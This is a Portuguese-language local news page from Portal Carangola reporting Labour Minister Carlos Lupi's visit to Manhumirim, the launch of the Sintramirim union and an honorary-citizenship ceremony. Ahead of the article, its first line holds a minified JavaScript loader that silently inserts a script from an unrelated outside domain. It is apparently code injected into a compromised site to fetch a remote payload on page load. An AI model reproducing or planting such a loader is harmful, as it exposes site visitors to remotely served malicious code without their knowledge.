;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ministro do Trabalho visita Manhumirim e participa de festividades - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ministro do Trabalho visita Manhumirim e participa de festividades

O Ministro do Trabalho, Carlos Lupi, esteve em Manhumirim no dia 16 de março, para o lançamento do Sintramirim (Sindicato dos Trabalhadores na Movimentação de Mercadorias e Armazenagem em Geral de Manhumirim e Região, que abrange Manhumirim, Alto Jequitibá, Alto Caparaó, Espera Feliz, Carangola, Divino de Carangola, Martins Soares, Durandé e Lajinha), sendo recebido pelo Prefeito, Ronaldo Lopes; pelo Deputado Federal, Mário Heringer, e outras autoridades do município. A convite do seu Assessor, Antônio Albuquerque, irmão do secretário municipal de Obras, Júlio Albuquerque, ambos nascidos em Manhumirim, o Ministro conheceu a cidade e assistiu parte do desfile de 16 de março, na avenida Raul Soares.

Muitos prefeitos e vereadores da região estiveram presentes na recepção ao Ministro, que deu atenção especial à solicitação do Prefeito Ronaldo, sobre o projeto de criação de uma zona franca da região do Caparaó, com isenção de impostos e outros subsídios que incentivem o desenvolvimento local.

Em um almoço realizado pela Prefeitura, Carlos Lupi recebeu do secretário e ex-vereador, Júlio Albuquerque, o título de cidadão honorário, de acordo com uma resolução de 2008. O presidente da Câmara, Jésus Aguiar, realizou a entrega de uma Moção ao Ministro. A diretoria do Sintramirim também esteve presente e recebeu das mãos do Ministro a carta de criação do Sindicato.

Leila Furtado / Assessoria de Comunicação / Prefeitura de Manhumirim

Ofertas

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.